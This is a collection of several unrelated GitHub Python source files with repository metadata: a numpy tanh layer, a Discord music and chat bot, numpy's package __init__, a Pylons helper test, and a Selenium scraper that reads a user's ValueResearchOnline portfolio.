ButtonCallback(203, 162)
ButtonCallback(134, 186)
iren.Initialize()
renWin.Render()
iren.Start()
root.mainloop()
|
{
"content_hash": "f7f7718f5de65549a817cfbaa36a266b",
"timestamp": "",
"source": "github",
"line_count": 168,
"max_line_length": 74,
"avg_line_length": 24.339285714285715,
"alnum_prop": 0.669601369528002,
"repo_name": "hlzz/dotfiles",
"id": "f2bdcc34c1bd374830cd3cf0ff1b2282779e5eef",
"size": "4112",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "graphics/VTK-7.0.0/Examples/Modelling/Python/SpherePuzzle.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "AppleScript",
"bytes": "1240"
},
{
"name": "Arc",
"bytes": "38"
},
{
"name": "Assembly",
"bytes": "449468"
},
{
"name": "Batchfile",
"bytes": "16152"
},
{
"name": "C",
"bytes": "102303195"
},
{
"name": "C++",
"bytes": "155056606"
},
{
"name": "CMake",
"bytes": "7200627"
},
{
"name": "CSS",
"bytes": "179330"
},
{
"name": "Cuda",
"bytes": "30026"
},
{
"name": "D",
"bytes": "2152"
},
{
"name": "Emacs Lisp",
"bytes": "14892"
},
{
"name": "FORTRAN",
"bytes": "5276"
},
{
"name": "Forth",
"bytes": "3637"
},
{
"name": "GAP",
"bytes": "14495"
},
{
"name": "GLSL",
"bytes": "438205"
},
{
"name": "Gnuplot",
"bytes": "327"
},
{
"name": "Groff",
"bytes": "518260"
},
{
"name": "HLSL",
"bytes": "965"
},
{
"name": "HTML",
"bytes": "2003175"
},
{
"name": "Haskell",
"bytes": "10370"
},
{
"name": "IDL",
"bytes": "2466"
},
{
"name": "Java",
"bytes": "219109"
},
{
"name": "JavaScript",
"bytes": "1618007"
},
{
"name": "Lex",
"bytes": "119058"
},
{
"name": "Lua",
"bytes": "23167"
},
{
"name": "M",
"bytes": "1080"
},
{
"name": "M4",
"bytes": "292475"
},
{
"name": "Makefile",
"bytes": "7112810"
},
{
"name": "Matlab",
"bytes": "1582"
},
{
"name": "NSIS",
"bytes": "34176"
},
{
"name": "Objective-C",
"bytes": "65312"
},
{
"name": "Objective-C++",
"bytes": "269995"
},
{
"name": "PAWN",
"bytes": "4107117"
},
{
"name": "PHP",
"bytes": "2690"
},
{
"name": "Pascal",
"bytes": "5054"
},
{
"name": "Perl",
"bytes": "485508"
},
{
"name": "Pike",
"bytes": "1338"
},
{
"name": "Prolog",
"bytes": "5284"
},
{
"name": "Python",
"bytes": "16799659"
},
{
"name": "QMake",
"bytes": "89858"
},
{
"name": "Rebol",
"bytes": "291"
},
{
"name": "Ruby",
"bytes": "21590"
},
{
"name": "Scilab",
"bytes": "120244"
},
{
"name": "Shell",
"bytes": "2266191"
},
{
"name": "Slash",
"bytes": "1536"
},
{
"name": "Smarty",
"bytes": "1368"
},
{
"name": "Swift",
"bytes": "331"
},
{
"name": "Tcl",
"bytes": "1911873"
},
{
"name": "TeX",
"bytes": "11981"
},
{
"name": "Verilog",
"bytes": "3893"
},
{
"name": "VimL",
"bytes": "595114"
},
{
"name": "XSLT",
"bytes": "62675"
},
{
"name": "Yacc",
"bytes": "307000"
},
{
"name": "eC",
"bytes": "366863"
}
],
"symlink_target": ""
}
|
import numpy as np
class HyperbolicTangentLayer(object):
"""A layer that applies tanh element-wise.
This layer has fixed scaling parameters for the tanh and
does not adjust weights during training.
"""
def __init__(self, m=2/3, alpha=1.7159, beta=0):
"""Create new HyperbolicTangentLayer.
Can specify scaling parameters m, alpha and beta:
output = alpha * tanh(m * input) + beta * input.
"""
self.m = m
self.alpha = alpha
self.beta = beta
def forward_prop(self, data):
self.newdata = self.alpha * np.tanh(self.m * data)
return self.newdata + self.beta * data
def back_prop(self, data, learning_rate=0):
return data * (self.m * self.alpha -
(self.m * self.newdata**2) + self.beta)
def pprint(self):
print(
"tangent hyperbolicus layer with m=",
self.m,
"and alpha=",
self.alpha,
"and beta=",
self.beta)
class HyperbolicTangentLayerSHAPE(object):
"""A layer that applies tanh element-wise.
This layer has fixed scaling parameters for the tanh and
does not adjust weights during training.
"""
def __init__(self, in_shape, m=2/3, alpha=1.7159, beta=0):
"""Create new HyperbolicTangentLayer.
Can specify scaling parameters m, alpha and beta:
output = alpha * tanh(m * input) + beta * input.
"""
self.in_shape = input_shape
self.out_shape = output_shape
self.m = m
self.alpha = alpha
self.beta = beta
def forward_prop(self, data):
self.newdata = self.alpha * np.tanh(self.m * data)
return self.newdata + self.beta * data
def back_prop(self, data, learning_rate=0):
return data * (self.m * self.alpha -
(self.m * self.newdata**2) + self.beta)
def pprint(self):
print(
"tangent hyperbolicus layer with m=",
self.m,
"and alpha=",
self.alpha,
"and beta=",
self.beta,
"and in_shape = out_shape =",
self.in_shape)
|
{
"content_hash": "037d2be7728e8be4eee6e2a61ea97277",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 62,
"avg_line_length": 29.743243243243242,
"alnum_prop": 0.5533848250795094,
"repo_name": "Knuppknou/academia_ai",
"id": "6d6e55687d2d6226e44183690c5a8a8e1cc806c0",
"size": "2201",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "academia_ai/neural_network/layers/hyperbolic_tangent.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "2208240"
},
{
"name": "Python",
"bytes": "57531"
}
],
"symlink_target": ""
}
|
import asyncio
import discord
import random
import scrims
from discord.ext import commands
class VoiceEntry:
def __init__(self, message, player):
self.requester = message.author
self.channel = message.channel
self.player = player
def __str__(self):
fmt = '*{0.title}* uploaded by {0.uploader} and requested by {1.display_name}'
duration = self.player.duration
if duration:
fmt = fmt + ' [length: {0[0]}m {0[1]}s]'.format(divmod(duration, 60))
return fmt.format(self.player, self.requester)
class VoiceState:
def __init__(self, bot):
self.current = None
self.voice = None
self.bot = bot
self.play_next_song = asyncio.Event()
self.songs = asyncio.Queue()
self.skip_votes = set() # a set of user_ids that voted
self.audio_player = self.bot.loop.create_task(self.audio_player_task())
def is_playing(self):
if self.voice is None or self.current is None:
return False
player = self.current.player
return not player.is_done()
@property
def player(self):
return self.current.player
def skip(self):
self.skip_votes.clear()
if self.is_playing():
self.player.stop()
def toggle_next(self):
self.bot.loop.call_soon_threadsafe(self.play_next_song.set)
async def audio_player_task(self):
while True:
self.play_next_song.clear()
self.current = await self.songs.get()
await self.bot.send_message(self.current.channel, 'Now playing ' + str(self.current))
self.current.player.start()
await self.play_next_song.wait()
class Music:
"""Voice related commands.
Works in multiple servers at once.
"""
def __init__(self, bot):
self.bot = bot
self.voice_states = {}
def get_voice_state(self, server):
state = self.voice_states.get(server.id)
if state is None:
state = VoiceState(self.bot)
self.voice_states[server.id] = state
return state
async def create_voice_client(self, channel):
voice = await self.bot.join_voice_channel(channel)
state = self.get_voice_state(channel.server)
state.voice = voice
def __unload(self):
for state in self.voice_states.values():
try:
state.audio_player.cancel()
if state.voice:
self.bot.loop.create_task(state.voice.disconnect())
except:
pass
@commands.command(pass_context=True, no_pm=True)
async def join(self, ctx, *, channel : discord.Channel):
"""Joins a voice channel."""
try:
await self.create_voice_client(channel)
except discord.ClientException:
await self.bot.say('Already in a voice channel...')
except discord.InvalidArgument:
await self.bot.say('This is not a voice channel...')
else:
await self.bot.say('Ready to play audio in ' + channel.name)
@commands.command(pass_context=True, no_pm=True)
async def summon(self, ctx):
"""Summons the bot to join your voice channel."""
summoned_channel = ctx.message.author.voice_channel
if summoned_channel is None:
await self.bot.say('You are not in a voice channel.')
return False
state = self.get_voice_state(ctx.message.server)
if state.voice is None:
state.voice = await self.bot.join_voice_channel(summoned_channel)
else:
await state.voice.move_to(summoned_channel)
return True
@commands.command(pass_context=True, no_pm=True)
async def play(self, ctx, *, song : str):
"""Plays a song.
If there is a song currently in the queue, then it is
queued until the next song is done playing.
This command automatically searches as well from YouTube.
The list of supported sites can be found here:
https://rg3.github.io/youtube-dl/supportedsites.html
"""
state = self.get_voice_state(ctx.message.server)
opts = {
'default_search': 'auto',
'quiet': True,
}
if state.voice is None:
success = await ctx.invoke(self.summon)
if not success:
return
try:
player = await state.voice.create_ytdl_player(song, ytdl_options=opts, after=state.toggle_next)
except Exception as e:
fmt = 'An error occurred while processing this request: ```py\n{}: {}\n```'
await self.bot.send_message(ctx.message.channel, fmt.format(type(e).__name__, e))
else:
player.volume = 0.6
entry = VoiceEntry(ctx.message, player)
await self.bot.say('Enqueued ' + str(entry))
await state.songs.put(entry)
@commands.command(pass_context=True, no_pm=True)
async def volume(self, ctx, value : int):
"""Sets the volume of the currently playing song."""
state = self.get_voice_state(ctx.message.server)
if state.is_playing():
player = state.player
player.volume = value / 100
await self.bot.say('Set the volume to {:.0%}'.format(player.volume))
@commands.command(pass_context=True, no_pm=True)
async def pause(self, ctx):
"""Pauses the currently played song."""
state = self.get_voice_state(ctx.message.server)
if state.is_playing():
player = state.player
player.pause()
@commands.command(pass_context=True, no_pm=True)
async def resume(self, ctx):
"""Resumes the currently played song."""
state = self.get_voice_state(ctx.message.server)
if state.is_playing():
player = state.player
player.resume()
@commands.command(pass_context=True, no_pm=True)
async def stop(self, ctx):
"""Stops playing audio and leaves the voice channel.
This also clears the queue.
"""
server = ctx.message.server
state = self.get_voice_state(server)
if state.is_playing():
player = state.player
player.stop()
try:
state.audio_player.cancel()
del self.voice_states[server.id]
await state.voice.disconnect()
except:
pass
@commands.command(pass_context=True, no_pm=True)
async def skip(self, ctx):
"""Vote to skip a song. The song requester can automatically skip.
3 skip votes are needed for the song to be skipped.
"""
state = self.get_voice_state(ctx.message.server)
if not state.is_playing():
await self.bot.say('Not playing any music right now...')
return
voter = ctx.message.author
if voter == state.current.requester:
await self.bot.say('Requester requested skipping song...')
state.skip()
elif voter.id not in state.skip_votes:
state.skip_votes.add(voter.id)
total_votes = len(state.skip_votes)
if total_votes >= 3:
await self.bot.say('Skip vote passed, skipping song...')
state.skip()
else:
await self.bot.say('Skip vote added, currently at [{}/3]'.format(total_votes))
else:
await self.bot.say('You have already voted to skip this song.')
@commands.command(pass_context=True, no_pm=True)
async def playing(self, ctx):
"""Shows info about the currently played song."""
state = self.get_voice_state(ctx.message.server)
if state.current is None:
await self.bot.say('Not playing anything.')
else:
skip_count = len(state.skip_votes)
await self.bot.say('Now playing {} [skips: {}/3]'.format(state.current, skip_count))
@commands.command(pass_context=True, no_pm=True)
async def fart(self, ctx, channel: discord.Channel):
"""Under Construction"""
player = voice.create_ffmpeg_player('fart.mp3') #play mp3
player.start()
class ChatBot:
"""Chat commands"""
def __init__(self, bot):
self.bot = bot
@commands.command(pass_context=True, no_pm=False)
async def hello(self, ctx):
"""Greet your favorite bot"""
name = ctx.message.author.name
return await self.bot.say("Hello {}!".format(name))
@commands.command(pass_context=True, no_pm=True)
async def flipcoin(self, ctx):
"""Totally unbiased coin flip"""
return await self.bot.say("Killdu Wins!")
@commands.command(pass_context=True, no_pm=True)
async def rolldice(self, ctx):
"""Returns random int from 1-6"""
roll = random.randint(1, 6)
return await self.bot.say('You rolled a {}'.format(roll))
@commands.command(pass_context=True, no_pm=True)
async def choose(self, ctx, choices : str):
"""Picks random option !choose opt1 opt2 ..."""
return await self.bot.say(random.choice(choices))
@commands.command(pass_context=True, no_pm=True)
async def memeME(self, ctx, *args):
"""Posts a random meme from the meme library"""
lines = open('memeLib.txt').read().splitlines()
myline = random.choice(lines)
return await self.bot.say(myline)
@commands.command(pass_context=True, no_pm=True)
async def addmeme(self, ctx):
"""Add a URL to the meme library"""
with open('memeLib.txt', 'a') as file:
s = list(ctx.message.content) #converts message into a l-i-s-t of chars
while (s[0] != ' '): #deletes characters up till the first space to remove command form context
s.pop(0)
s.pop(0)
newS = ''.join(s)
file.write('\n')
file.write(newS)
return await self.bot.say('Your meme was successfully added')
@commands.command(pass_context=True, no_pm=True)
async def delmsgs(self, ctx, *args):
"""deletes the last (ammount) of messages"""
try:
ammount = int(args[0]) + 1 if len(args) > 0 else 2
except:
await self.bot.send_message(ctx.message.channel, embed=discord.Embed(color=discord.Color.red(), descrition="Please enter a valid value for message ammount!"))
return
cleared = 0
failed = 0
async for m in self.bot.logs_from(ctx.message.channel, limit=ammount):
try:
await self.bot.delete_message(m)
cleared += 1
except:
failed += 1
pass
failed_str = "\n\nFailed to clear %s message(s)." % failed if failed > 0 else ""
returnmsg = await self.bot.send_message(ctx.message.channel, embed=discord.Embed(color=discord.Color.blue(), description="Cleared %s message(s).%s" % (cleared, failed_str)))
await asyncio.sleep(4)
await self.bot.delete_message(returnmsg)
@commands.command(pass_context=True, no_pm=True)
async def esportsready(self, ctx, *args):
"""Posts oversized "esports ready" emote"""
async for m in self.bot.logs_from(ctx.message.channel, limit=1):
await self.bot.delete_message(m)
return await self.bot.say("https://cdn.discordapp.com/attachments/364645055841173505/368252323044261888/eSportsReady.png")
@commands.command(pass_context=True, no_pm=True)
async def parkour(self, ctx):
"""Parkour"""
del1(ctx)
return await self.bot.say("Hardcore Parkour! https://www.youtube.com/watch?v=0Kvw2BPKjz0")
@commands.command(pass_context=True, no_pm=False)
async def LFS(self, ctx, start="", end="", dayofweek=""):
name = ctx.message.author
await insert-scrim(name, start, end, dayofweek)
|
{
"content_hash": "5f8d33fc7dd9d688fb08d289ebb3e41f",
"timestamp": "",
"source": "github",
"line_count": 322,
"max_line_length": 181,
"avg_line_length": 37.015527950310556,
"alnum_prop": 0.5966943535531505,
"repo_name": "PWills2013/r2Bot",
"id": "efb122a3c9915e4746dd7eeaa53ab3cb2c2bccdb",
"size": "11919",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "voice.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "13510"
}
],
"symlink_target": ""
}
|
"""
NumPy
=====
Provides
1. An array object of arbitrary homogeneous items
2. Fast mathematical operations over arrays
3. Linear Algebra, Fourier Transforms, Random Number Generation
How to use the documentation
----------------------------
Documentation is available in two forms: docstrings provided
with the code, and a loose standing reference guide, available from
`the NumPy homepage <https://www.scipy.org>`_.
We recommend exploring the docstrings using
`IPython <https://ipython.org>`_, an advanced Python shell with
TAB-completion and introspection capabilities. See below for further
instructions.
The docstring examples assume that `numpy` has been imported as `np`::
>>> import numpy as np
Code snippets are indicated by three greater-than signs::
>>> x = 42
>>> x = x + 1
Use the built-in ``help`` function to view a function's docstring::
>>> help(np.sort)
... # doctest: +SKIP
For some objects, ``np.info(obj)`` may provide additional help. This is
particularly true if you see the line "Help on ufunc object:" at the top
of the help() page. Ufuncs are implemented in C, not Python, for speed.
The native Python help() does not know how to view their help, but our
np.info() function does.
To search for documents containing a keyword, do::
>>> np.lookfor('keyword')
... # doctest: +SKIP
General-purpose documents like a glossary and help on the basic concepts
of numpy are available under the ``doc`` sub-module::
>>> from numpy import doc
>>> help(doc)
... # doctest: +SKIP
Available subpackages
---------------------
doc
Topical documentation on broadcasting, indexing, etc.
lib
Basic functions used by several sub-packages.
random
Core Random Tools
linalg
Core Linear Algebra Tools
fft
Core FFT routines
polynomial
Polynomial tools
testing
NumPy testing tools
f2py
Fortran to Python Interface Generator.
distutils
Enhancements to distutils with support for
Fortran compilers support and more.
Utilities
---------
test
Run numpy unittests
show_config
Show numpy build configuration
dual
Overwrite certain functions with high-performance Scipy tools
matlib
Make everything matrices.
__version__
NumPy version string
Viewing documentation using IPython
-----------------------------------
Start IPython with the NumPy profile (``ipython -p numpy``), which will
import `numpy` under the alias `np`. Then, use the ``cpaste`` command to
paste examples into the shell. To see which functions are available in
`numpy`, type ``np.<TAB>`` (where ``<TAB>`` refers to the TAB key), or use
``np.*cos*?<ENTER>`` (where ``<ENTER>`` refers to the ENTER key) to narrow
down the list. To view the docstring for a function, use
``np.cos?<ENTER>`` (to view the docstring) and ``np.cos??<ENTER>`` (to view
the source code).
Copies vs. in-place operation
-----------------------------
Most of the functions in `numpy` return a copy of the array argument
(e.g., `np.sort`). In-place versions of these functions are often
available as array methods, i.e. ``x = np.array([1,2,3]); x.sort()``.
Exceptions to this rule are documented.
"""
from __future__ import division, absolute_import, print_function
import sys
import warnings
from ._globals import ModuleDeprecationWarning, VisibleDeprecationWarning
from ._globals import _NoValue
# We first need to detect if we're being called as part of the numpy setup
# procedure itself in a reliable manner.
try:
__NUMPY_SETUP__
except NameError:
__NUMPY_SETUP__ = False
if __NUMPY_SETUP__:
sys.stderr.write('Running from numpy source directory.\n')
else:
try:
from numpy.__config__ import show as show_config
except ImportError:
msg = """Error importing numpy: you should not try to import numpy from
its source directory; please exit the numpy source tree, and relaunch
your python interpreter from there."""
raise ImportError(msg)
from .version import git_revision as __git_revision__
from .version import version as __version__
__all__ = ['ModuleDeprecationWarning',
'VisibleDeprecationWarning']
# Allow distributors to run custom init code
from . import _distributor_init
from . import core
from .core import *
from . import compat
from . import lib
# FIXME: why have numpy.lib if everything is imported here??
from .lib import *
from . import linalg
from . import fft
from . import polynomial
from . import random
from . import ctypeslib
from . import ma
from . import matrixlib as _mat
from .matrixlib import *
from .compat import long
# Make these accessible from numpy name-space
# but not imported in from numpy import *
# TODO[gh-6103]: Deprecate these
if sys.version_info[0] >= 3:
from builtins import bool, int, float, complex, object, str
unicode = str
else:
from __builtin__ import bool, int, float, complex, object, unicode, str
from .core import round, abs, max, min
# now that numpy modules are imported, can initialize limits
core.getlimits._register_known_types()
__all__.extend(['__version__', 'show_config'])
__all__.extend(core.__all__)
__all__.extend(_mat.__all__)
__all__.extend(lib.__all__)
__all__.extend(['linalg', 'fft', 'random', 'ctypeslib', 'ma'])
# These are added by `from .core import *` and `core.__all__`, but we
# overwrite them above with builtins we do _not_ want to export.
__all__.remove('long')
__all__.remove('unicode')
# Remove things that are in the numpy.lib but not in the numpy namespace
# Note that there is a test (numpy/tests/test_public_api.py:test_numpy_namespace)
# that prevents adding more things to the main namespace by accident.
# The list below will grow until the `from .lib import *` fixme above is
# taken care of
__all__.remove('Arrayterator')
del Arrayterator
# Filter out Cython harmless warnings
warnings.filterwarnings("ignore", message="numpy.dtype size changed")
warnings.filterwarnings("ignore", message="numpy.ufunc size changed")
warnings.filterwarnings("ignore", message="numpy.ndarray size changed")
# oldnumeric and numarray were removed in 1.9. In case some packages import
# but do not use them, we define them here for backward compatibility.
oldnumeric = 'removed'
numarray = 'removed'
if sys.version_info[:2] >= (3, 7):
# Importing Tester requires importing all of UnitTest which is not a
# cheap import Since it is mainly used in test suits, we lazy import it
# here to save on the order of 10 ms of import time for most users
#
# The previous way Tester was imported also had a side effect of adding
# the full `numpy.testing` namespace
#
# module level getattr is only supported in 3.7 onwards
# https://www.python.org/dev/peps/pep-0562/
def __getattr__(attr):
if attr == 'testing':
import numpy.testing as testing
return testing
elif attr == 'Tester':
from .testing import Tester
return Tester
else:
raise AttributeError("module {!r} has no attribute "
"{!r}".format(__name__, attr))
def __dir__():
return list(globals().keys()) + ['Tester', 'testing']
else:
# We don't actually use this ourselves anymore, but I'm not 100% sure that
# no-one else in the world is using it (though I hope not)
from .testing import Tester
# Pytest testing
from numpy._pytesttester import PytestTester
test = PytestTester(__name__)
del PytestTester
def _sanity_check():
"""
Quick sanity checks for common bugs caused by environment.
There are some cases e.g. with wrong BLAS ABI that cause wrong
results under specific runtime conditions that are not necessarily
achieved during test suite runs, and it is useful to catch those early.
See https://github.com/numpy/numpy/issues/8577 and other
similar bug reports.
"""
try:
x = ones(2, dtype=float32)
if not abs(x.dot(x) - 2.0) < 1e-5:
raise AssertionError()
except AssertionError:
msg = ("The current Numpy installation ({!r}) fails to "
"pass simple sanity checks. This can be caused for example "
"by incorrect BLAS library being linked in, or by mixing "
"package managers (pip, conda, apt, ...). Search closed "
"numpy issues for similar problems.")
raise RuntimeError(msg.format(__file__))
_sanity_check()
del _sanity_check
|
{
"content_hash": "8843aa6a8430dd74e41f929aef5a1191",
"timestamp": "",
"source": "github",
"line_count": 260,
"max_line_length": 85,
"avg_line_length": 34.06923076923077,
"alnum_prop": 0.6551140212237525,
"repo_name": "jorisvandenbossche/numpy",
"id": "349914b2f3a776b41b99eeada73fbf24e933eadd",
"size": "8858",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "numpy/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "9068647"
},
{
"name": "C++",
"bytes": "189527"
},
{
"name": "Fortran",
"bytes": "10884"
},
{
"name": "JavaScript",
"bytes": "16928"
},
{
"name": "Makefile",
"bytes": "4290"
},
{
"name": "Python",
"bytes": "8307898"
},
{
"name": "Shell",
"bytes": "8482"
},
{
"name": "sed",
"bytes": "5741"
}
],
"symlink_target": ""
}
|
import warnings
from unittest import TestCase
from paste.fixture import TestApp
from paste.httpexceptions import HTTPMovedPermanently
from paste.registry import RegistryManager
import pylons
from pylons.controllers import WSGIController
from pylons.controllers.util import etag_cache
from pylons.decorators import jsonify as orig_jsonify
from pylons.util import ContextObj
from __init__ import ControllerWrap, SetupCacheGlobal, TestWSGIController
class SimpleTestWSGIController(TestWSGIController):
wsgi_app = None
def __init__(self, *args, **kargs):
TestWSGIController.__init__(self, *args, **kargs)
self.baseenviron = {}
app = ControllerWrap(self.wsgi_app)
app = self.sap = SetupCacheGlobal(app, self.baseenviron)
app = RegistryManager(app)
self.app = TestApp(app)
def setUp(self):
TestWSGIController.setUp(self)
self.baseenviron.update(self.environ)
class HelpersController(WSGIController):
def test_etag_cache(self):
etag_cache('test')
return "from etag_cache"
class TestHelpers(SimpleTestWSGIController):
wsgi_app = HelpersController
def setUp(self):
SimpleTestWSGIController.setUp(self)
warnings.simplefilter('error', DeprecationWarning)
def tearDown(self):
SimpleTestWSGIController.tearDown(self)
warnings.simplefilter('always', DeprecationWarning)
def test_return_etag_cache(self):
self.baseenviron['pylons.routes_dict']['action'] = 'test_etag_cache'
response = self.app.get('/')
assert '"test"' == response.header('Etag')
assert 'from etag_cache' in response
|
{
"content_hash": "31601af894bce1e3ee3c0062d231aaa6",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 76,
"avg_line_length": 31.49056603773585,
"alnum_prop": 0.7082085080886759,
"repo_name": "obeattie/pylons",
"id": "9efb5e065f07a8668431e5359029d8edc7f5b7fb",
"size": "1669",
"binary": false,
"copies": "1",
"ref": "refs/heads/trunk",
"path": "tests/test_units/test_helpers.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "5828"
},
{
"name": "Python",
"bytes": "326918"
}
],
"symlink_target": ""
}
|
import os
import re
import json
import time
import pdb
from pyquery import PyQuery as pq
import lxml.html
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
UA_STRING = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36"
DEBUG = True
DEBUG_READ = True
def log(s,log_type="INFO"):
if DEBUG:
print(log_type+":"+s)
def WaitFor(driver, strByType, strIdentifier, timeout =10):
try:
el = WebDriverWait(driver, timeout).until(
EC.presence_of_element_located((strByType, strIdentifier))
)
except:
el = None
if el:
log("Found item:"+strByType+":"+strIdentifier)
else:
log("Not Found item:"+strByType+":"+strIdentifier,"WARN")
return(el)
def cleanup_data(vr=None):
if DEBUG_READ and not vr:
vr = json.loads(open("valueresearch_portfolio.json","r").read())
# vr["stocks_raw"] = lstStock
# vr["mfs_raw"] = lstMF
# vr["stock_subtotal_raw"] = lststockSubTotal
# vr["MF_subtotal_raw"] = lstmfSubTotal
# vr["summary_raw"] = lstsummary
lstCategory = []
# summaryvalue
d = {
"totalvalue":vr["summary_raw"][0],
"onedaychngamt":vr["summary_raw"][1].split(r"|")[0].strip(),
"onedaychngpert":vr["summary_raw"][1].split(r"|")[1].strip(),
"totalgrowthamt":vr["summary_raw"][2].split(r"|")[0].strip(),
"totalgrowthpert":vr["summary_raw"][2].split(r"|")[1].strip(),
}
vr['summaryvalue'] = d
lstCategory = []
# stocksubtotal
d = {
"investedamt":vr["stock_subtotal_raw"][7],
"latestamt":vr["stock_subtotal_raw"][10],
"onedaychngamt":"",
"onedaychngpert":"",
"returnamt":"",
"returnpert":"",
}
vr['stocksubtotal'] = d
# mfsubtotal
d = {
"investedamt":vr["MF_subtotal_raw"][7],
"latestamt":vr["MF_subtotal_raw"][10],
"onedaychngamt":"",
"onedaychngpert":"",
"returnamt":"",
"returnpert":"",
}
vr['mfssubtotal'] = d
# stock
lstCategory = []
for i in vr["stocks_raw"]:
lstCategory.append({
"title":i[0].split("\u00a0")[0],
"portpert":i[2],
"latestnav":i[3].split(" ")[0],
"navdate":i[3].split(" ")[1],
"onedaychngamt":i[5],
"onedaychngpert":i[6],
"investamt":i[8],
"costnav":i[9],
"latestvalue":i[11],
"units":i[12],
"returnabs":i[14],
"returnpertpa":i[15]
})
vr['stock'] = lstCategory
lstCategory = []
# mfs
lstCategory = []
for i in vr["mfs_raw"]:
lstCategory.append({
"title":i[0].split("\u00a0")[0],
"portpert":i[2],
"latestnav":i[3].split(" ")[0],
"navdate":i[3].split(" ")[1],
"onedaychngamt":i[5],
"onedaychngpert":i[6],
"investamt":i[8],
"costnav":i[9],
"latestvalue":i[11],
"units":i[12],
"returnabs":i[14],
"returnpertpa":i[15]
})
vr['mfs'] = lstCategory
lstCategory = []
del vr["stocks_raw"]
del vr["mfs_raw"]
del vr["stock_subtotal_raw"]
del vr["MF_subtotal_raw"]
del vr["summary_raw"]
return vr
def get_portfolio(email,passwd, drivertype, driver_path=''):
if drivertype == "Chrome":
if driver_path is '':
raise Exception("Driverpath cannot be blank for Chrome")
from selenium.webdriver.chrome.options import Options
opts = Options()
opts.add_argument("user-agent="+UA_STRING)
# disable images
prefs = {"profile.managed_default_content_settings.images":2}
opts.add_experimental_option("prefs",prefs)
driver = webdriver.Chrome(driver_path,chrome_options=opts)
elif drivertype == "PhantomJS":
dcap = dict(DesiredCapabilities.PHANTOMJS)
dcap["phantomjs.page.settings.userAgent"] = (UA_STRING)
driver = webdriver.PhantomJS(desired_capabilities=dcap)
else:
raise Exception("Invalid Driver Type:" + drivertype)
driver.set_window_size(1366, 680)
vr = {}
vr['error'] = []
# vr['portfolio'] = []
# vr['portfolio_raw'] = []
driver.get("https://www.valueresearchonline.com/")
linkSkipAdlanding = WaitFor(driver, By.LINK_TEXT, "Go directly to Value Research Online")
if linkSkipAdlanding:
linkSkipAdlanding.click()
else:
vr['warn'].append("'Skip' link not found")
btnNoThanks = WaitFor(driver, By.CSS_SELECTOR, "#noThanks")
if btnNoThanks:
btnNoThanks.click()
else:
vr['error'].append("'No Thanks' button not found")
linkSignin = WaitFor(driver, By.CSS_SELECTOR, "a.btnsignin")
if linkSignin:
linkSignin.click()
else:
vr['error'].append("Login link not found")
inputboxUsername = WaitFor(driver, By.CSS_SELECTOR, "input#username")
if inputboxUsername:
inputboxUsername.send_keys(email)
else:
vr['error'].append("Username Field not found/Not in Signin Page")
inputboxPasswd = WaitFor(driver, By.CSS_SELECTOR, "input#password")
if inputboxPasswd:
inputboxPasswd.send_keys(passwd)
btnSubmit = WaitFor(driver, By.CSS_SELECTOR, "input#submitbtn")
if btnSubmit:
btnSubmit.click()
if DEBUG:
log("Logging in..")
lblLoginConf = WaitFor(driver, By.CSS_SELECTOR, "span#headerLoginText")
if lblLoginConf:
log("You are now logged in")
else:
vr['error'].append("Login Failed")
else:
vr['error'].append("Submit Button not found")
linkPortfolio = WaitFor(driver, By.CSS_SELECTOR, "a[href='/port/']")
if linkPortfolio:
linkPortfolio.click()
lblPortfolioPage = WaitFor(driver, By.CSS_SELECTOR, "div.Portfolio-summary-head")
if not lblPortfolioPage:
return(vr)
tblSnapsht = WaitFor(driver, By.CSS_SELECTOR, "table#snapshot_tbl")
if tblSnapsht:
re_pattern_summary = re.compile("(?:PORTFOLIO VALUE IN R)|(?:VALUE CHANGE TODAY IN R)|(?:TOTAL GAIN IN R \| % PA)|(?:[ ]+)")
re_pattern_stocks = re.compile("(?:[ ]+)")
re_pattern_mfs = re.compile("(?:[ ]+)")
WaitFor(driver, By.CSS_SELECTOR, "table#snapshot_tbl tbody.trData")
tblStock, tblMF = driver.find_elements_by_css_selector("table#snapshot_tbl tbody.trData")
tblStockSubTotal, tblMFSubTotal = driver.find_elements_by_css_selector("table#snapshot_tbl tbody.subtotal")
tblSummary = driver.find_elements_by_css_selector("table.Portfolio-summary tr")[1]
# print(tblMFSubTotal.get_attribute('innerHTML'))
# print(tblSummary.get_attribute('innerHTML'))
rowsStock = [i for i in pq(tblStock.get_attribute('innerHTML'))('tr:not(.soldHoldings)')]
rowsMF = [i for i in pq(tblMF.get_attribute('innerHTML'))('tr:not(.soldHoldings)')]
lstStock = []
lstMF = []
for row in rowsStock:
lstStock.append([re.sub(re_pattern_stocks," ",str(i.text_content())).strip() for i in pq(lxml.html.tostring(row))('td') ])
for row in rowsMF:
lstMF.append([re.sub(re_pattern_mfs," ",str(i.text_content())).strip() for i in pq(lxml.html.tostring(row))('td') ])
lststockSubTotal = [i.text_content() for i in pq(tblStockSubTotal.get_attribute('innerHTML'))('tr.NotImportHoldings td') ]
lstmfSubTotal = [i.text_content() for i in pq(tblMFSubTotal.get_attribute('innerHTML'))('tr td') ]
lstsummary = [re.sub(re_pattern_summary," ",str(i.text_content())).strip() for i in pq(tblSummary.get_attribute('innerHTML'))('td') ]
vr["stocks_raw"] = lstStock
vr["mfs_raw"] = lstMF
vr["stock_subtotal_raw"] = lststockSubTotal
vr["MF_subtotal_raw"] = lstmfSubTotal
vr["summary_raw"] = lstsummary
else:
raise Exception("Portfolio table not found!")
if DEBUG:
